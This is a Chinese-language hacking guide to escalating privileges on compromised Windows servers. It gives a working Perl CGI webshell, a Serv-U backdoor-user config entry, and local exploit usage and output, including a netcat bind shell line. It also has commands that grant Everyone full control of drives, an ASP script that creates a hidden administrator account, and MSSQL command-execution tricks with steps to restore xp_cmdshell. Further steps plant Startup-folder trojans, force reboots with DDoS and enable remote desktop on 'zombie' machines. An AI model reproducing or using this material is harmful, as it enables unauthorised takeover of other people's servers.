1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
看能否跳轉到這個目錄,如果行那就最好了,直接下它的CIF檔案,得到pcAnywhere密碼,登陸
2.C:\WINNT\system32\config\
進這裡下它的SAM,破解使用者的密碼
用到破解sam密碼的軟體有LC,SAMinside
3.C:\Documents and Settings\All Users\「開始」菜單\程式\
看這裡能跳轉不,我們從這裡可以擷取好多有用的資訊
可以看見好多快捷方式,我們一般選擇Serv-U的,然後本地檢視屬性,知道路徑後,看能否跳轉
進去後,如果有權限修改ServUDaemon.ini,加個使用者上去,密碼為空
[USER=heart|1]
Password=mu126096AB858B7DF2FB117486CF018282
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=e:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYValues=
這個使用者具有最高權限,然後我們就可以ftp上去 quote site exec xxx 來提升權限
4.c:\winnt\system32\inetsrv\data\
就是這個目錄,同樣是erveryone 完全控制,我們所要做的就是把提升權限的工具上傳上去,然後執行
5.看能否跳轉到如下目錄
c:\php, 用phpspy
c:\prel,有時候不一定是這個目錄(同樣可以通過下載下傳快捷方式看屬性獲知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/\//ig;
$execthis = $_;
syswrite(STDOUT, "<HTML><PRE>\r\n", 13);
open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";
system($execthis);
syswrite(STDOUT, "\r\n</PRE></HTML>\r\n", 17);
close(STDERR);
close(STDOUT);
exit;
儲存為cgi執行,
如果不行,可以試試 pl 擴充呢,把剛才的 cgi 檔案改為 pl 檔案,送出 http://anyhost//cmd.pl?dir
顯示"拒絕通路",表示可以執行了!馬上送出:先的上傳個su.exe(ser-u提升權限的工具)到 prel的bin目錄
http://anyhost//cmd.pl?c\perl\bin\su.exe
傳回:
Serv-u >3.x Local Exploit by xiaolu
USAGE: serv-u.exe "command"
Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
現在是 IUSR 權限,送出:
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe c: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe d: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe e: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe f: /E /T /G everyone:F"
如果傳回下面的資訊,就表示成功了
<220 Serv-U FTP Server v5.2 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
>SITE MAINTENANCE
[+] Creating New Domain...
<200-DomainID=2
<220 Domain settings saved
[+] Domain xl:2 created
[+] Creating Evil User
<200-User=xl
200 User settings saved
[+] Now Exploiting...
>USER xl
>PASS 111111
[+] Now Executing: cacls.exe c: /E /T /G everyone:F
<220 Domain deleted
這樣所有分區為everyone完全控制
現在我們把自己的使用者提升為管理者:
http://anyhost//cmd.pl?c\perl\bin\su.exe " net localgroup administrators IUSR_anyhost /add"
6.可以成功運作"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提升權限
用這個cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
檢視有特權的dll檔案:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特權一族
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機子放的位置不一定一樣)
我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps
"C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll"
"C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來檢視是不是加進去了
7.還可以用這段代碼試提升,好象效果不明顯
<<%Response.Expires=0">%@codepage=936%><%Response.Expires=0
on error resume next
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user","WekweN$")
od.SetPassword "WekweN" <-----密碼
od.SetInfo
Set of=GetObject(oz&"/WekweN$,user")
oe.Add(of.ADsPath)
Response.write "WekweN$ 超級帳号建立成功!"%>
用這段代碼檢查是否提升成功
<%@codepage=936%>
<%Response.Expires=0
on error resume next '查找Administrators組帳号
Set tN=server.createObject("Wscript.Network")
Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
For Each admin in objGroup.Members
Response.write admin.Name&"<br>"
Next
if err then
Response.write "不行啊:Wscript.Network"
end if
%>
8.C:\Program Files\Java Web Start\
這裡如果可以,一般很小,可以嘗試用jsp的webshell,聽說權限很小,本人沒有遇見過。
9.最後了,如果主機設定很變态,可以試下在c:\Documents and Settings\All Users\「開始」菜單\程式\啟動"寫入bat,vbs等木馬。
等到主機重新開機或者你ddos逼它重新開機,來達到權限提升的目的。
[EXTERNAL]
ClientCheckDLL1=servu.dll
1:找台有4899的機器,可以進行4899登陸(前提)
2:把下列文字生成*.BAT傳到殭屍電腦的C:下
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
再用黑社會軟體對其進行TELNET登陸并執行此檔案,執行有個過程,一般3~5分鐘不=
之後你可以掃描,發現他的3389端口開了!OK!
3:帳号建立 http://ww3.tty-1.net:808/main.htm
在殭屍電腦的TELNET下輸入
net user 你想建立的使用者名字 你想建立的使用者密碼 /add
net localgroup administrators 你建立的使用者名字 /add
如果執行成功,則之後會指令下會有一排字"指令執行成功",等這條出現後再執行下一條即可
4:OK!成功!登陸吧!
使用sql的查詢分析器并登陸
寫入代碼
declare @shell int exec sp_oacreate 'wscript.shell',
@shell output exec sp_oamethod @shell, 'run','null,'c:\winnt\system\cmd.exe /c net user 123 456 /add'
/不用多說建立使用者為123密碼為456/
declare @shell int exec sp_oacreate'wscript.shell',
@shell output exec sp_oamethod
@shell,'run',null,'C:\winnt\system32\cmd.exe/ c net localgroup
administrators 123/add',
把132提升權限
後面就用sql的cmd shell你想幹什麼就幹什麼吧.其實也可以windows下提權工具也很多.
SA權限僅需xp_regwrite即可有dos shell
删除xp_cmdshell和xplog70.dll不用擔心,隻要保留xp_regwrite就可以執行系統指令,擁有一個dos shell
利用RDS的一個老問題,在IIS 4.0的時候被廣泛利用,現在好像沒多少人想得起來了
絕對比去想辦法恢複xp_cmdshell來得經濟實惠,不過需要猜一下系統路徑
nt/2k: x:\winnt\system32\
xp/2003: x:\windows\system32\
如果有回顯,可以看到執行傳回結果,否則需要先判斷主機OS類型再試
當然如果野蠻一點,四個輪流來一遍也行。
首先開啟沙盤模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE''SOFTWARE\Microsoft\Jet\4.0\Engines''SandBoxMode''REG_DWORD'1
然後利用jet.oledb執行系統指令
select * from
openrowset('microsoft.jet.oledb.4.0'';database=c:\winnt\system32\ias\ias.mdb''select
shell("cmd.exe /c net user admin admin1234 /add")')
擴充儲存過程被删除以後可以有很簡單的辦法恢複:
删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
恢複
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
這樣可以直接恢複,不用去管sp_addextendedproc是不是存在
-----------------------------
删除擴充存儲過過程xp_cmdshell的語句:
恢複cmdshell的sql語句
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
開啟cmdshell的sql語句
判斷存儲擴充是否存在
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
傳回結果為1就ok
恢複xp_cmdshell
exec master.dbo.addextendedproc
'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects
where xtype='x' and name='xp_cmdshell'
否則上傳xplog7.0.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
堵上cmdshell的sql語句
sp_dropextendedproc "xp_cmdshell
asp木馬提權
net user 檢視是否有cmd的權限
如果沒有用海洋2005配合上傳的cmd.exe來執行
假如:上傳一個工具ftp.exe 具體的路徑是:D:\mine\ftp.exe
現在加個管理者帳号指令是 D:\mine\ftp.exe "net user mackson$ mackson /add"
現在我們來把 mackson 這個帳号提升為管理者````
這裡是指令 D:\mine\ftp.exe "net localgroup administrators mackson$ /add"
現在我們來看看 mackson 這個帳号的資料 指令: net user mackson$
如果是管理者的話,現在我們主要是去開他 3389 然後終端連接配接
我們傳個 3389.exe去
D:\mine\3389.exe 這就是開33898終端服務的工具路徑了````
上傳開啟3389的軟體位址:D:\mine\3389.exe
我們隻要在CMD裡面輸入D:\mine\ftp.exe "D:\mine\3389.exe"
現在隻需要在CMD指令輸入裡面 輸入上面的指令 然後回車 就可以開他 3389 了
伺服器重新開機中。。。。。
重新開機後,打開遠端桌面連接配接。。。